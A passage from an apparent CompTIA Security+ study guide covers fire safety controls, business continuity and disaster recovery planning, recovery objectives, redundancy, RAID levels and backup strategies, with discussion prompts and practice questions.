generates heat, so it heightens that risk. It also adds an extra challenge to fire suppression systems: not only is
fighting an electrical fire different than fighting one caused by ordinary flammable materials, but water can
easily destroy expensive electronics even if the fire was easily extinguished or a false alarm.

Exam Objective: CompTIA SY0-501 3.9.16.3


Fire detection systems are a first line of defense. Smoke detectors, heat sensors, and carbon monoxide
detectors all have their place in recognizing early signs of a fire: at the minimum, they should signal a fire
alarm to alert local personnel. They can also be networked to notify offsite personnel or fire departments,
trigger suppression systems, or shut down building HVAC before it can carry toxic smoke through the
ventilation system.
When a fire is detected, the best way to minimize damage is to put it out while it's still small and localized.
Portable fire extinguishers should be clearly placed and kept near flammable materials and other fire risks: the
exact number and placing needed will depend on the building's structure, contents, and usage, along with
local fire safety regulations. They must also be regularly inspected and tested by qualified technicians, and
tagged as compliant.
You can't just use any extinguisher on any fire: for example, an extinguisher using pressurized water will put
out burning paper fine, but it will only spread a grease fire or even cause an explosion. Always choose
extinguishers appropriate for the types of fire they will be protecting. Rating systems vary by region. In the
US, the following extinguisher classes are defined: a given extinguisher is rated for one or more classes.

Class A Most flammable solids, such as paper, cloth, wood, or plastic. Class A extinguishers typically use
pressurized water, or multipurpose dry chemical.
Class B Flammable liquids, such as oils, solvents, or gasoline. Class B extinguishers typically use CO 2 or
dry chemical mixes, and work by depriving the fire of oxygen.
Class C Fires involving active electrical current, not only in electrical equipment but in other flammable
materials in contact with exposed wiring. Class C extinguishers generally use CO 2 or dry
chemicals.
Class D Combustible metals such as magnesium or sodium. Such metal fires can use water or CO 2 as an
oxidizer just like oxygen, so must be put out using specialized dry powder extinguishers.
Class K Cooking oils and fats. Functionally Class K extinguishers are more or less the same as Class B,
but are specialized for kitchen use.

CompTIA Security+ Exam SY0-501 471


Chapter 10: Organizational security / Module C: Physical security and safety

When a portable extinguisher is too little or too late, your facility should be equipped with fixed systems that
can extinguish larger fires, or at least control them until firefighters arrive. In most commercial buildings, this
means a water-based sprinkler system triggered manually or automatically in case of fire. Since water is
dangerous to use on electrical equipment, sprinklers frequently are tied to systems that cut power to electrical
equipment, and are not installed in fire-resistant electrical rooms or other places where water and fire would
make an especially dangerous combination.
Where fire is a risk, but sprinklers are inappropriate, alternate fixed systems are available. For electrical areas
like server rooms, a popular choice was formerly Halon, a non-flammable gas that stops the chemical reaction
of a fire while minimizing harm evacuating personnel and emergency responders. Due to health and
environmental concerns, Halon has largely been replaced by other inert gases or "clean agent" mixtures such
as HFC-227 or FM-200, though even those are commonly still called "Halon" in casual speech. Fire-
suppressing gas systems of any sort can still be hazardous to humans, so if your server room uses one make
sure to study its directions and safety guidelines.

Coordinating security and safety procedures


Especially in smaller organizations, a lot of times the person (or people) in charge of security policies will
also be in charge of emergency procedures. It's not too surprising: both roles are for protection of company
assets and functions in the face of the dangerous and unexpected. It's fortunate in a way, since sometimes the
two can seemingly work against each other: locking the physical environment up too tightly can prevent fast
and safe evacuations; on the other hand, the chaos of a poorly managed drill or actual emergency can make a
fine time for a security breach.
Above all, safety laws and ethical principles dictate that you have to put human lives ahead of data security,
but if you're not careless in policy design the two shouldn't interfere with each other.

 Consult a building layout while planning both secured areas and fire escape routes, so that the former
don't obstruct the latter.
 In the event of power loss, carefully distinguish where fail close electronic locks can keep areas secure,
and where fail open locks must enable safe escape.
 Where necessary use alarmed, one-way emergency exit doors to allow easy escape without
compromising security.
 Use alert systems to warn personnel about both safety and security emergencies, but make sure one
won't be easily mistaken for the other.
 Regularly test safety controls and perform emergency drills with employees, both to ensure they operate
correctly and to reduce panic or confusion in the case of a real emergency or even false alarm.
 Coordinate all safety drills and tests with security personnel, so that secure systems won't be threatened.
Discussion: Safety and environmental controls
1. Is all of your workplace's electronic equipment kept in areas with ample cooling and ventilation?
Answers may vary.
2. Identify potential sources of EMI in your workplace.
Answers may vary, and include electrical devices, HVAC systems, and microwave ovens.
3. What fire suppression measures are available in your workplace?
Portable extinguishers and fixed systems are both likely.
4. Are employees in your workplace trained in safety procedures?
Answers may vary, but they should be.
5. Could any of the physical security controls in your workplace compromise safety, or vice-versa?
Answers may vary.

472 CompTIA Security+ Exam SY0-501


Chapter 10: Organizational security / Module C: Physical security and safety

Assessment: Physical security and safety


1. You need to install a new fire extinguisher next to the server closet. What class would be most useful?
Choose the best response.
 Class A
 Class B
 Class C
 Class D

2. What qualifies as both a preventive and a detective control? Choose the best response.
 A locked door
 A motion detector
 A security guard
 A surveillance camera

3. What are hot and cold aisles designed to assist? Choose the best response.
 Air circulation in the server room
 Defining routes for evacuating employees and incoming emergency workers
 Preventing EMI
 Preventing the spread of fires

4. One server closet has particularly sensitive equipment that's suffering EMI due to a nearby electrical
motor. You can't really move either the equipment or the motor, so what option might help? Choose the
best response.
 Airgap
 Cold aisle
 Faraday cage
 Mantrap

5. Fail-close door locks are _________. Choose the best response.


 Good for safety and security
 Good for safety but bad for security
 Bad for safety but good for security
 Bad for safety and security

6. In a building floor plan you see lines representing a Protected Distribution System. What is it used for?
Choose the best response.
 Backup power
 Encrypted data
 HVAC Controls
 Unencrypted data

CompTIA Security+ Exam SY0-501 473


Chapter 10: Organizational security / Summary: Organizational Security

Summary: Organizational Security


You should now know:
 How to design and document effective security policies, including acceptable use, passwords,
personnel management, and change management. You should also know how to plan business
agreements with security in mind.
 How to enforce security policies and best practices through role-based employee training, and how to
revise policies and training procedures over time.
 How to choose appropriate physical security and environmental controls to protect facilities,
equipment, and data, without endangering the safety of employees.

474 CompTIA Security+ Exam SY0-501


Chapter 11: Disaster planning and recovery
You will learn:
 About business continuity planning
 About fault tolerance and recovery
 How to respond to security incidents

CompTIA Security+ Exam SY0-501 475


Chapter 11: Disaster planning and recovery / Module A: Business continuity

Module A: Business continuity


Bad things are ahead for your organization. Even if you're successful in your business goals, and successfully
identify and mitigate risks, at best that makes disasters less frequent and less severe. When a disaster strikes
—natural, technical, or human-created—your organization's existence itself could be at stake. Having plans
and procedures in place beforehand can make all the difference in whether you can maintain business
operations and recover from a serious problem.
You will learn:
 About continuity planning
 How to create business continuity plans
 How to create and test disaster recovery plans

Continuity planning
When disaster strikes, your organization's business continuity depends on being able to maintain the function
of critical operations through the recovery process, or at least to restore them quickly enough to not endanger
the organization's long-term survival. It's a big concept, and it's natural to associate it with major disasters like
a fire, flood, or massive data breach that would be a challenge to a well-prepared organization, but that's not
the only time when it comes into play. Many businesses have been lastingly damaged or even bankrupted by
the results of small failures like a hard drive crash, loss of a critical employee, or badly timed service outage
—in those cases, poor planning and inadequate response is almost always to blame.
Continuity planning is tied in closely with risk management: it includes not only enhancing your
organization's resilience against both anticipated and unanticipated threats, but also to ensure its ability to
recover from serious setbacks. It should even include contingency plans for how to minimize the impact on
the organization or its stakeholders if full recovery is impossible.
Business continuity planning isn't an easy task, since there are many interrelated challenges you need to
address, and multiple plans or documents you might need to produce as part of your overall strategy.

Business continuity plan A document including analysis of risks to business operations, controls to mitigate
(BCP) them, and procedures for maintaining or restoring service in the event of disaster.
The BCP might be a comprehensive document including all others within it, or it
might focus on centralized business functions such as payroll and customer
service.
Business impact analysis An assessment that identifies critical business functions, how long the business
(BIA) can operate without them, and what threats exist to each.
Disaster recovery plan Technical procedures for restoring services and operations after major disruptions.
(DRP) A single organization may have multiple DRPs, for example for individual
facilities, departments, or business functions.
IT contingency plan Procedures for restoring individual information systems after a disaster, or for
maintaining partial function during the recovery process. Also known as an
Information system contingency plan (ISCP). Multiple ISCPs might be defined
under one DRP, corresponding to each critical system or service.
Continuity of operations Procedures for moving critical operations to a temporary site during disaster
plan (COOP) recovery. Can apply to general business functions as well as IT systems in
particular.

476 CompTIA Security+ Exam SY0-501


Chapter 11: Disaster planning and recovery / Module A: Business continuity

Crisis communications Procedures for communications in the event of a disaster. Crisis communication
plan plans should both coordinate internal communications to aid in recovery efforts,
and define a single authority for providing information to or answering questions
from customers or outside organizations.
Succession plan Procedures for managing sudden changes of personnel. Succession plans should
identify essential employee roles within the organization, and identify or train
replacements that can step in should those roles become open. They should also
define a clear chain of command during disaster recovery.

Creating a BCP
Just creating a full business continuity plan is a lot of work, never mind any expense you have to put into
preparations. The first challenge can be getting management to buy into it: if even a devastating threat seems
distant or unlikely, it's common for people to resist putting much time and money into combating it. It's
important to make a strong business case of what lack of such a plan could do.
Actually creating the BCP will require a committee with representatives from different departments from your
organization. Otherwise, it's possible that essential business operations won't be accounted for. You'll also
need a methodology for the entire process. ISO 22301:2012 provides a general standard for business
continuity planning, but you'll also want to research resources specific to your organization's mission and
structure. Government resources can be particularly useful: not only do government agencies regularly plan
for and respond to disasters ranging from local disruptions to global catastrophes, they have a strong interest
in helping public and private organizations within their borders plan as well. In the US, the Federal
Emergency Management Agency (FEMA) publishes BCP guidelines and offers resources for state and local
agencies as well as private companies.
In general, the process of creating a BCP mirrors that of any other risk management program.

1. Perform a risk assessment, much like for normal security planning.


2. Create a BIA.
3. Design the BCP and its supporting recovery plans and controls.
4. Implement and test the plan.
5. Analyze the results to apply further refinement.

Creating a BIA
A business impact analysis is related to the impact analysis of a risk assessment, but it comes from the
opposite direction. Instead of starting with a list of threats and determining what damage each could do to
your organization, the BIA begins with a list of your business's functions, and determines how long it could
function without each.

Exam Objective: CompTIA SY0-501 5.2.4, 5.2.5

1. Identify functions critical to sustained business operations. A function is critical if its loss would result in
large revenue loss, safety risks, or failure to comply with regulations and contractual obligations.
2. Identify systems, resources, or even other functions used by each critical function.
For example, a technical support call center requires telephone service, electrical power, and access to
the company's product knowledge base.
3. Prioritize critical functions according to maximum tolerable downtime (MTD), or how quickly they must
be restored to prevent serious damage to business operations.
For example, a critical function may need to be restored within four hours, an important function within
72 hours, and a useful but non-essential function within 30 days.

CompTIA Security+ Exam SY0-501 477


Chapter 11: Disaster planning and recovery / Module A: Business continuity

4. Identify what threats could compromise each business function.


Threats could be natural disasters, accidents, inside or outside attacks, contractual or labor disputes, and
even armed conflict.
5. Determine mitigation techniques that could be used against each threat.
For example, if the threat is "a hard drive crash on the company web server" you could mitigate it
through performing regular backups, or by maintaining redundant servers so if one crashes the other
can take over.

Disaster recovery plans


One of the most demanding parts of BCP design is creating the DRPs, ISCPs, COOP, and other necessary
procedures that back up the high-level concepts in the BCP itself. They can be highly detailed technical
documents, cataloging all that you need to do to restore or maintain business operations, both before and after
disaster strikes. The first step is assembling what kind of information each plan needs.

Exam Objective: CompTIA SY0-501 5.6.2, 5.6.5.5

System Documentation Network diagrams, facilities blueprints, system configuration data, user names
and passwords, software activation keys.
Reserve resources Replacement parts, redundant systems, and alternate sites that can be used to
repair or replace the affected resource.
Vendor lists Vendors and suppliers for equipment that may need to be replaced, and
procedures or contracts needed for quick replacement of critical components.
Alternate business Procedures that allow you to adhere to meet your business needs during a
practices recovery period, especially in regard to contractual or regulatory requirements.
For example, if a datacenter outage forces you to use different payment
processing procedures, they still must have comparable security controls.
Backup policies Procedures for creating and safely storing backups that can be restored in case of
system or data loss.
Recovery procedures Detailed procedures for assessing, containing, and repairing damage to critical
systems, as well as for restoring those which cannot be repaired.
Order of recovery A list of what functionality should be restored in which order following a disaster.
Most obviously it should give priority to business-critical functions, but it might
also be based on dependencies between different functions, or on the difficulty of
a specific task.
Personnel list The members of each recovery team, along with their responsibilities and contact
information.
Emergency contacts Contact information for relevant parties outside the team, such as upper
management, utility companies, or emergency services.

The plans themselves should be detailed, but easy to read and follow, especially any which might need to be
followed under stressful emergency conditions. To ensure that recovery documents themselves won't be lost
or inaccessible in case of disaster, they should be stored both electronically and on paper, and copies should
be kept both on and off site. At the same time, plans with information useful to an attacker should be kept
secure and confidential.

478 CompTIA Security+ Exam SY0-501


Chapter 11: Disaster planning and recovery / Module A: Business continuity

BCP and DRP testing


Even if you put a lot of care into your plan, that doesn't mean it's any good. To look for problems or critical
oversights it needs to be tested. In fact, to keep personnel practiced and to adjust for any changes in your
situation, you should test all plans regularly, typically at least twice a year. There are multiple ways to conduct
a test; as you might expect, the most accurate ways are also the most work, but a mix of techniques is best.

Exam Objective: CompTIA SY0-501 5.6.5.1, 5.6.5.2

Checklist test Giving the plan to one or more people to review and examine item by item.
Having at least one person from each affected department perform a checklist test
is good for finding out if the plan is outdated, the contact information is wrong,
and if any steps or supplementary documentation are missing.
Tabletop exercise Gathering the team or department together to review the plan and walk through a
theoretical disaster step by step. Also known as structured walkthroughs, tabletop
exercises are especially useful for identifying missing steps or problems with how
responsibilities are assigned.
Simulation test Testing the actual disaster response test under controlled circumstances, either on
a small or a large scale. Simulation tests are the best way to find holes in a plan
that other methods miss, but they can be difficult and potentially disruptive to
hold. Some simulation test examples include:
 Conducting emergency drills to test alarms and personnel training
 Testing secondary systems
 Simulating bringing an alternate site online from backups
 Testing the ability of the primary system to switch to the secondary system

Whatever type of test you conduct, use it to generate feedback and make changes. Likewise, if all or part of
the plan is put into action by a real disaster or even a false alarm, schedule a review by the whole team in
order to look for where the plan can be revised and improved. Finally, understand that any BCP or DRP is a
living document: even if you're confident it doesn't have any major weaknesses, a change in system
configuration, personnel, or overall situation means you'll need to look for new shortcomings in your plan.

Discussion: Continuity planning


1. Perform a simple BIA for your organization, based on your existing knowledge.
Answers may vary.
2. Based on your BIA, choose a couple of potential disasters and design recovery plans.
Answers may vary.
3. List some resources and detailed procedures you'd need to really put those plans into motion.
Answers may vary.

CompTIA Security+ Exam SY0-501 479


Chapter 11: Disaster planning and recovery / Module A: Business continuity

Assessment: Business continuity


1. What document specifically covers moving operations to a temporary site? Choose the best response.
 BCP
 BIA
 COOP
 DRP

2. Which document is a business most likely to have more than one of? Choose the best response.
 BCP
 BIA
 COOP
 DRP

3. What is also known as a "structured walkthrough?" Choose the best response.


 Checklist test
 ISCP
 Simulation test
 Tabletop exercise

480 CompTIA Security+ Exam SY0-501


Chapter 11: Disaster planning and recovery / Module B: Fault tolerance and recovery

Module B: Fault tolerance and recovery


Technical decisions for disaster recovery should back up your policy decisions. Equipment failures or other
damage to systems are inevitable, so you need to choose solutions that both minimize the chance of
permanent data loss, and prevent unacceptable disruptions of business operations.
You will learn:
 About recovery objectives
 About fault tolerance and redundant systems
 About RAID
 How to design backup policies

Recovery objectives
When it comes to choosing recovery options, the old adage of "good, fast, or cheap—pick two" generally
holds true. Recovering quickly and completely from a major disaster will generally take not only more
planning, but more work and expense beforehand. For critical services this may be money well-spent, but
you'll have to evaluate options for each plan.

Exam Objective: CompTIA SY0-501 5.2.1


When you create a BIA, or sign a SLA for a service you're buying or providing, it's likely to have a couple
related terms for when and how services will be restored in the result of a disaster.

Recovery time The maximum expected amount of down time between when a service is taken offline by a
objective (RTO) disaster, and when its functions will be fully restored. This can include troubleshooting
prior to recovery, the recovery itself, and any testing necessary before bringing the
recovered system live. For example, if a failure of your payroll systems will start to cause
serious impact after about two weeks, a RTO of 14 days or fewer gives you time to prevent
disruptions. RTO is related to the concept of MTTR, though it's used in relation to recovery
from a particular disaster rather than to a particular device failure.
Recovery point The maximum expected period of time for which data will be lost in the case of a disaster.
objective (RPO) Essentially, RPO is a function of how often you must back up data used by a service. For
example, if you want to make sure that a failure of your content management system will
never cause you to lose more than a day's work, you can define an RPO of 24 hours, and
satisfy it by making nightly backups of the repository.

Both RTO and RPO are flexible: you can set them as long or as short as you like, according to how critical the
system's ongoing functions or past data are. Ideally they'd both be measured in milliseconds, but that can be
very expensive. An RPO measured in days can be satisfied by ordinary backup methods, while one of a few
hours or less requires continuous backup solutions of some kind. Similarly, a sufficiently long RTO gives you
time to set up a new system and restore data even if you have to order new equipment, while an RTO of
seconds can be satisfied only by a redundant system ready to go on demand.
Additionally, RTO and RPO are independent of each other, at least to some extent: if it's not important that a
payment system comes back online quickly, but it's essential that no existing transactions be lost, you can
keep continuous backups, but set a 30 day RTO and restore service once you have the time.
Finally, remember that RTO and RPO are goals, and there's no magic that will guarantee they are met. When
creating a plan you'll need to make a cost-benefit analysis to find a realistic RTO and RPO according to your
needs and budget, and carefully design procedures to ensure you'll meet them. When defining either as part of
an SLA, you'll also need to define what rights and obligations each party has if objectives can't be met.

CompTIA Security+ Exam SY0-501 481


Chapter 11: Disaster planning and recovery / Module B: Fault tolerance and recovery

Fault tolerance
Reducing RTO and RPO are just two ways of increasing the availability of critical services and data. The third
is reducing failure in the first place, by increasing MTTF or MTBF. To maintain high-availability services,
you need to target these three elements both separately and as an interrelated whole, and do so within your
budget.

Exam Objective: CompTIA SY0-501 3.8.9, 3.8.10, 5.2.6


Any technological system, from a CPU cooler to a datacenter, has components that can and will fail over
time. A given component is a single point of failure if its failure will stop the entire system from working,
very much like a failure in a critical system is for a business. Consider a desktop computer: the failure of a
single application process, USB port, or optical drive is unlikely to render the computer useless. On the other
hand, a failure of the operating system kernel, power supply, or system drive will knock the computer out of
commission until it's repaired. Single points of failure are one the main enemies of availability.
The simplest way to deal with a single point of failure is to reinforce it so it's less likely to fail, for example
by buying a higher quality component. A more complete solution is to use fault-tolerant systems, where a
failure of a critical component might impair the overall system, but won't make it fail. For example, storage
media, network protocols, and even RAM can be designed to detect and correct small data errors that would
otherwise result in data corruption. On an older PC a CPU with a failed fan might crash or even destroy itself
from overheating; a modern CPU will detect the overheating and slow itself down to keep operating at
reduced performance. You can even apply this sort of fault-tolerance to software: in older versions of
Windows failure of the graphics driver was one of the most common reasons for "BSOD" errors and system
reboots, while in modern versions Windows can restart most hardware drivers without more than brief
disruption to other applications.

Redundancy
Fault tolerance doesn't have to be a matter of designing individual components to cope better with errors. In
fact, it's more common to add redundancy: backup or parallel components structured so that a failure in one
still leaves the other working and able to sustain the system. Even better, you might be able to repair or
replace the failed component without interrupting service—that way, you're not just increasing the time
between failures, but you're eliminating any service disruption during the inevitable repair process. A
redundant component that can be replaced without shutting down the system it's attached to is called hot-
swappable.

Exam Objective: CompTIA SY0-501 3.8.5, 3.8.6, 3.8.7, 3.8.8


Redundancy can be applied to physical components, entire systems, or support services. A wide variety of
redundancy solutions are popular in modern networks.

Backup power Brief power outages or irregularities can be compensated for by a battery-powered
uninterpretable power supply (UPS), while longer ones require backup generators. Servers
also commonly have redundant power supplies, allowing one to be replaced if it fails.
RAID A Redundant array of independent disks allows redundancy by saving data to multiple hard
drives at once. That way, a failure in one drive can be compensated for without data loss.
Load balancing While splitting a high-traffic service among multiple redundant servers is usually done for
sake of performance, it also means that the failure of one server only reduces performance
rather than interrupting service.
Clustering Server clustering is related to, and often used in conjunction with, load balancing, but it
goes a little further. Multiple servers in a cluster don't just supply redundant resources, but
are aware of each other and operate toward a common goal. Clusters are usually able to
dynamically reallocate duties when individual servers fail.

482 CompTIA Security+ Exam SY0-501


Chapter 11: Disaster planning and recovery / Module B: Fault tolerance and recovery

Virtualization Virtual and cloud systems don't in themselves provide redundancy, but they make it much
easier to quickly deploy new copies of existing systems whenever and wherever you need
them. This doesn't only help with recovery from a failure; it also can provide elasticity to
meet transient surges in demand and scalability to meet long-term growth.
Alternate sites Large organizations might even maintain multiple facilities for sake of redundancy. If a
disaster impairs or disables one site, others can pick up the slack until service is restored.
Even if there aren't specific backup sites, distributive allocation of critical business
resources mean that failures at one site will do minimal harm to the overall organization.

Alternate sites and spare parts


Different scales of disaster require different kinds of responses. For limited problems, like a failure in an
individual critical system, you might be able to meet your recovery objectives right on site. One of the best
ways to reduce the RTO of an equipment failure is to keep spares on hand, to save the time of purchasing a
new hard drive, power supply, or critical server.

Exam Objective: CompTIA SY0-501 5.6.1, 5.6.4.2, 5.6.4.3, 5.6.5.4, 5.6.5.3

Hot spare A spare component that's connected, powered on, and ready to serve as an automatic failover if
the primary fails. A fault-tolerant server might have hot spare drives or network cards ready to
take over at a moment's notice.
Cold spare A spare component that's kept in storage until it's needed. A technician must install it and power
it up in order to restore the system to normal function. A cold spare can still be a hot-swappable
device.

Larger disasters, like a fire, flood, or long-term power outage, could disable your entire facility. To plan for
that sort of disaster, you'll need to line up an alternate site. Depending on your needs and budget, you might
pay for a dedicated site exclusively used by your organization, or you might time-share a site with another
organization, with the understanding that things will be more difficult if you both need it at once. Alternate
sites are also classified by "temperature."

Hot site A fully operational site, complete with computer hardware, network infrastructure, installed
software, and even recent backups: it can be activated in hours, or less, from the recovery plan's
initiation. While a hot site maximizes availability, it's expensive to maintain what is essentially a
second data center sitting idle most of the time Sufficiently large organizations might instead use
distributive allocation so that the "hot site" itself is just excess capacity spread throughout
multiple active sites.
Cold site A site without hardware set up in advance. Typically a cold site will have power, ventilation, and
network connectivity, but otherwise it's an empty space. To actually recover operations there,
you'll need to install hardware, configure the network, install software, and restore backups. A
cold site is much slower to restore than a hot site, but it's no more expensive than the rent.
Warm site A compromise between a hot site and a cold site. At the least it will have some computers and
networking hardware set up, even if it's not a complete replica of the primary site; it may also
have software installed, or older backups. A warm site can be operational much more quickly
than a cold site, but less than a hot site; likewise, its cost is intermediate between the two.

For IT services alone, a cloud provider might be more cost-effective for some purposes than even a time-
shared alternate site, but a physical location allows you to carry on a wider range of business operations.
Regardless of what kind of alternate site you choose, it's important to find a location that you can operate
effectively out of. Depending on the nature of your business it may be complicated to maintain or move to an
alternate site far from your primary one. On the other hand, in the event of some widespread disaster like a
large storm or armed conflict two nearby sites might be placed out of commission at once.

CompTIA Security+ Exam SY0-501 483


Chapter 11: Disaster planning and recovery / Module B: Fault tolerance and recovery

RAID
With RAID, two or more hard drives are configured into an array. Data is saved across the array. How the
data is saved across the array depends on the RAID level configured—different levels provide different
combinations of improved performance and data security.

Exam Objective: CompTIA SY0-501 3.8.11

RAID 5 provides striping and parity across three or more disks

RAID 0 Spreads the contents of files in roughly even parts across two or more drives; also called disk
striping. Striping improves performance by allowing the CPU to read and write simultaneously
on all drives at once, but since there's no fault tolerance if just one drive fails all the data in the
array is lost. This means that RAID 0 actually makes data less secure by introducing more
points of failure. RAID 0 is only useful for data that needs high speed access but either doesn't
need backed up or is preserved by other means.
RAID 1 Writes identical data to two or more hard drives; also called drive mirroring. Mirroring doesn't
really help performance: reading can be a little faster but write performance is typically slower.
The benefit of RAID 1 is fault tolerance. If one drive in the array fails, all the data is available
on at least one other drive.
RAID 5 Uses disk striping across at least three drives and includes parity data. If one of the drives in the
array fails, the data that was stored on the failed drive can be recreated from the parity data on
the remaining drives. RAID 5 has the read performance increase you'd see with RAID 0, plus it
includes fault tolerance without using as much disk space as RAID 1.
RAID 6 Similar to RAID 5, but requires at least four disks and includes twice the parity data. This way,
up to two disks can fail without any loss of data.
RAID 10 A nested RAID level, also known as RAID 1+0. Nested RAID levels combine RAID 0 (data
striping) with other RAID techniques. RAID 10 combines RAID 1 (mirroring) with RAID 0
(disk striping), making it a stripe of mirrors. RAID 10 requires four hard drives - two hard
drives for the disk mirror and then two more disks to stripe the mirrored disks. Other nested
RAID levels include RAID 01, RAID 100, RAID 50 and RAID 60.

484 CompTIA Security+ Exam SY0-501


Chapter 11: Disaster planning and recovery / Module B: Fault tolerance and recovery

RAID arrays of any kind can fail. As long as you're not using RAID 0 a single drive failure won't cause the
whole array to fail. In fact, most use hot-swappable drives so that you can replace a failed drive and rebuild
the array without shutting it down. This process reduces performance temporarily, but eliminates downtime. A
bigger problem is that drives aren't the only thing that can fail. If the RAID controller fails, or if malware or
other software writes bad data to the disk, it doesn't matter how many mirrored or parity disks you have.
Disks can even fail due to the stress of a rebuild. For these reasons, never use RAID as a substitute for making
regular data backups.

Discussion: Fault tolerance and recovery


1. Identify single points of failure in your organization's network or other systems.
Answers may vary, but can include network hardware, critical systems, power, or so on.
2. Consider fault tolerant or redundant controls that could reduce the risks associated with those single
points of failure.
Answers may vary, but can include redundant components or equipment, backup power, and so on.
3. Does your organization have any alternate sites for critical operations?
Answers may vary. A business with multiple facilities might have that as it is.
4. Do you or your organization use RAID for data storage?
Answers may vary, but it's common for high performance, high availability, or large capacity servers and
SANs.

Data backups
Implemented properly, RAID reduces your need for traditional backups, but it will never replace them. If the
controller fails, if an attack or application error wipes your data, or if something happens to the physical array
itself, the data will be gone forever—a problem that can bankrupt entire businesses. Whether you're using
redundancy systems or not, you should perform periodic backups of sensitive data to external media in case
something happens to the system.

Exam Objective: CompTIA SY0-501 2.2.11


How often you should back up important data depends on how often it changes, and how short you want the
associated RPO to be. For example, you might want a transaction database backed up nightly, or even
constantly to the cloud, but only create system image backups immediately after installation or major updates
and configuration changes.
Most operating systems, Windows included, come with some sort of backup software built in. It's usually
pretty basic, but more elaborate solutions are available from third parties. Depending on the type, they might
back up to an external hard drive, to a network drive, to magnetic tapes or optical media, or even to a cloud
service. Some even use a two-stage process, copying first to a hard drive and then backing that up to a tape.
Network and cloud backups are especially popular as continual backup systems, while scheduled backups are
more likely to use hard drives or tapes. For serious data security, you'll always want to maintain at least one
set of off-site backups too, in case something happens to your facility itself.

Backup types
Backups can take a lot of time, use a lot of space, and since they need both processing and disk access they
hurt performance while they're going on. Since most data on a system doesn't change every day, you can save
a lot of time focusing on what's changed rather than just updating the whole system every day. The hard part
is being certain what's backed up and what isn't. In Windows file systems, a useful tool is the archive bit in
each file's properties. Windows sets the archive bit when a file is created or modified: backup utilities can
then clear the bit to mark a file as backed up.

Exam Objective: CompTIA SY0-501 5.6.3

CompTIA Security+ Exam SY0-501 485


Chapter 11: Disaster planning and recovery / Module B: Fault tolerance and recovery

When you perform or schedule backups, first you need to instruct the software what files, folders, or volumes
to include in the backup. Which files are included in any particular backup depends on the type of backup you
choose.
Full Backs up all files whether their archive bits are set or not, and clears the archive bit for all
files. This creates a "complete" backup that can fully restore a selected volume, and makes it
easy to track subsequent changes.
Incremental Backs up only files with a set archive bit, then clears the bit. An incremental backup saves all
changes since the last full or incremental backup. This is a much quicker process than a full
backup. To restore individual files, you only need the latest incremental backup containing
each file. To fully restore the volume, you need all incremental backups you've made, plus
the original full backup. This makes restorations more complex and time-consuming.
Differential Backs up only files with a set archive bit, but does not clear the bit afterward. This means that
each subsequent differential backup will have the full set of changes made since the last full
backup; it also means that each subsequent differential backup will be larger and take longer.
However, restoring from differential backups is easier: you only need the original full backup
and the most recent differential backup.
Snapshot A type of backup made to quickly capture the state of a system at a given point without much
impacting ongoing operations. Snapshots take a virtual copy of the running system and then
perform the backup from that. They can be full, incremental, or differential, and can complete
much more quickly than traditional backups, but they require systems and software that
supports them. Snapshots are popular for VMs or high-availability databases.

Especially since you're going to be creating multiple backups, it's not a matter of choosing a type of backup
and sticking to it, but rather planning a backup schedule and using appropriate backup types. For an example
scenario, imagine that you back up one volume on a critical server every weekday evening, and you want a
backup archive going back four weeks. The volume (somewhat unrealistic but with convenient math) has a
relatively constant 100 GB of files on it, and about 5 GB of files change on any given day. You back data up
to tape, at a speed of 50 GB/hour, and restore at the same rate. You might consider the following three
options:
 A full backup every night. This means two hours of running backup every night (though if it's
scheduled after hours this doesn't require human attention), and a total storage capacity of 2000 GB for
four weeks of backups. If there's a failure on the server, you just need to replace the drive and take two
hours to restore from the most recent backup.
 A full backup every Friday night, and an incremental backup the other four days of the week. This
means two hours of backing up on Friday, and six minutes on every other night. Since incremental
backups are only 5 GB, you only need 120 GB per week, or 480 GB for the whole four week set. If you

486 CompTIA Security+ Exam SY0-501


Chapter 11: Disaster planning and recovery / Module B: Fault tolerance and recovery

need to restore from an archive, you need the full backup and all incrementals made since then. This
means a failure late in the week increases your restore time.
 A full backup every Friday night and a differential backup the other four days. Unlike incremental
backups, each differential backup is larger than the one before: 5 GB on Monday, 10 GB on Tuesday,
and so on. This means it takes a little longer every day. It also means the total storage you need is
larger: 150 GB a week, or 600 GB total. The benefit is that if you need to restore from a backup on
Friday morning, you don't need the whole set of daily backups: you only need last week's full backup,
and today's differential.

In that example, full backups might be a good option: 2000 GB isn't that hard to archive today, and the time to
run backups isn't a big concern if you're letting them run unattended after hours. When backups become larger
(and thus slower) or you want to run them more frequently, incremental and differential backups become
much more advantageous.
Choosing between differential and incremental backups is a little more complicated: incremental backups are
quicker to create and use the least total space, while differential backups make quick restoration easier (if still
not as easy as full backups). Cloud backups, and other continual backup solutions, almost always rely on
incremental backups along with back-end software that takes most of the version-control work out of the end
user's hands.

Backup security
Backups are themselves sensitive data, and that means you need to make sure they're not lost and don't fall
into the wrong hands. Some important points to keep in mind:

Exam Objective: CompTIA SY0-501 5.6.4.1

 Keep backup media clearly labeled and physically secure.


 Store and transmit backup archives on the network with the same security you would use for the
original files.
 Transport backups securely: use encryption over insecure networks, and physical security for external
media.
 Keep recent backups in an off-site location, such as another facility owned by your organization, or a
company specializing in data storage.
 Securely erase or physically destroy backup media to prevent dumpster diving.

Security isn't just about keeping the archives from being lost or stolen though: you also need to make sure that
they work. If you're using faulty equipment or incorrect configurations that you can't restore fully from, the
whole backup process just becomes a false sense of security. At the minimum, regularly check backup media
for file integrity. For a more complete test, restore individual files or even the whole archive to a test system.
Not only will practicing restoration procedures test the media, it will make sure personnel are used to doing it
when a real disaster hits.
Cloud-based backups are very convenient, but ad a whole new set of security worries. Cloud backup is a form
of risk transference, since you're trusting the cloud provider to preserve your data's confidentiality, integrity,
and availability. Choose a provider with those needs in mind, and ensure that your business agreement clearly
specifies responsibilities and liabilities for both parties. You also must be aware of any legal issues involved
in storing your particular data with a third party, especially if data sovereignty laws might apply.
Finally, don't forget that backup media doesn't last forever. Whether you're using tapes, hard drives, or
anything else, track how much use each unit has seen, and replace it according to manufacturer
recommendations. Dispose of backup media as you would any other media containing sensitive information.

CompTIA Security+ Exam SY0-501 487


Chapter 11: Disaster planning and recovery / Module B: Fault tolerance and recovery

Creating backup policies


Knowing good backup practices is important, but it's critical that you also have a firm written policy for
creating backups, approved by both management and IT administrators as suiting your backup needs.
Otherwise, there are just too many chances for something to go wrong.

1. For each system or data set, identify what should be backed up.
2. Determine the retention requirements for each backup.
In addition to your organization's internal needs, consider data retention requirements for regulatory
compliance.
3. Choose a backup strategy and schedule according to your RTO, RPO, and storage capacity.
4. Choose how data will be kept secure.
5. Assign personnel responsibilities.
